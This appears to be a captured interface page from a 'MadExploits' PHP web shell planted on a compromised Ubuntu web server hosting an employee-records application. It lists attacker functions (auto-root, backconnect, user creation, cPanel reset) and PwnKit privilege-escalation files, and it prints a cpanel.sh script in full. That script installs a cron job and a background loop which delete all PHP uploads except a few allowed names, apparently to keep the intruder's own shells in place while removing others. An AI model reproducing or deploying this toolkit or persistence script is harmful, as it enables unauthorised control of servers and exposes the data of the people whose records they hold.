Linux 0193-eed-moe-app01 5.15.0-46-generic #49-Ubuntu SMP Thu Aug 4 18:03:25 UTC 2022 x86_64
Apache/2.4.52 (Ubuntu)
: 172.16.229.234 | : 18.227.13.136
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.18
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
eedpims /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
SpryAssets
[ DIR ]
drwxr-xr-x
applicantlist
[ DIR ]
drwxr-xr-x
applicantpass
[ DIR ]
drwxr-xr-x
applicantselection
[ DIR ]
drwxr-xr-x
apqualification
[ DIR ]
drwxr-xr-x
arcpdata
[ DIR ]
drwxr-xr-x
auditobj
[ DIR ]
drwxr-xr-x
bootstrap
[ DIR ]
drwxr-xr-x
childinfo
[ DIR ]
drwxr-xr-x
circleoffice
[ DIR ]
drwxr-xr-x
common
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
designation
[ DIR ]
drwxr-xr-x
diciplinary
[ DIR ]
drwxr-xr-x
directorate
[ DIR ]
drwxr-xr-x
district
[ DIR ]
drwxr-xr-x
districtoffice
[ DIR ]
drwxr-xr-x
educational
[ DIR ]
drwxr-xr-x
empaddress
[ DIR ]
drwxr-xr-x
emplanguage
[ DIR ]
drwxr-xr-x
empleave
[ DIR ]
drwxr-xr-x
empvch
[ DIR ]
drwxr-xr-x
foreigntraining
[ DIR ]
drwxr-xr-x
frtravel
[ DIR ]
drwxr-xr-x
general
[ DIR ]
drwxr-xr-x
generaladmin
[ DIR ]
drwxr-xr-x
haward
[ DIR ]
drwxr-xr-x
headoffice
[ DIR ]
drwxr-xr-x
homepage
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
localtraining
[ DIR ]
drwxr-xr-x
login
[ DIR ]
drwxr-xr-x
ministrylist
[ DIR ]
drwxr-xr-x
office
[ DIR ]
drwxr-xr-x
officeemployee
[ DIR ]
drwxr-xr-x
page
[ DIR ]
dr-xr-xr-x
payscal
[ DIR ]
drwxr-xr-x
placeinspaction
[ DIR ]
drwxr-xr-x
postingrecord
[ DIR ]
drwxr-xr-x
promotion
[ DIR ]
drwxr-xr-x
publication
[ DIR ]
drwxr-xr-x
reports
[ DIR ]
drwxr-xr-x
salaccounts
[ DIR ]
drwxr-xr-x
servicehistry
[ DIR ]
drwxr-xr-x
spouse
[ DIR ]
drwxr-xr-x
thlinelist
[ DIR ]
drwxr-xr-x
trevent
[ DIR ]
drwxr-xr-x
upazila
[ DIR ]
drwxr-xr-x
userinfo
[ DIR ]
drwxr-xr-x
usernormal
[ DIR ]
drwxr-xr-x
userregistration
[ DIR ]
drwxr-xr-x
userrole
[ DIR ]
drwxr-xr-x
users
[ DIR ]
drwxr-xr-x
y
[ DIR ]
drwxr-xr-x
z
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
class-wp.php
68.74
KB
-r--r--r--
cpanel.sh
1.19
KB
-rwxr-xr-x
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cpanel.sh
#!/bin/bash # Define the target directory UPLOADS_DIR="/var/www/wms/storage/app/public/uploads" # List of allowed PHP files (customize this) ALLOWED_PHP="ho.php hol.php admins-dir.php index.php" # Full path to the script (needed for cron) SCRIPT_PATH="$(realpath "$0")" # Function to delete unauthorized PHP files delete_unauthorized_php() { # Find all PHP files in uploads/ and subfolders find "$UPLOADS_DIR" -type f -iregex ".*\.\(php[3-9]?\|phar\)$" | while read -r file; do # Extract the filename from the full path filename=$(basename "$file") # Check if the file is in the allowed list; if not, delete it if ! echo "$ALLOWED_PHP" | grep -qw "$filename"; then rm "$file" 2>/dev/null fi done } # Initial run in the background delete_unauthorized_php & # Install as a cron job for www-data (runs every minute) (crontab -u www-data -l 2>/dev/null; echo "* * * * * /bin/bash $SCRIPT_PATH") | crontab -u www-data - # Check if cron installation and background process started successfully if [ $? -eq 0 ]; then echo "success" else echo "failed to install" exit 1 fi # Run in the background, checking every 15 seconds while true; do delete_unauthorized_php sleep 15 done &
Close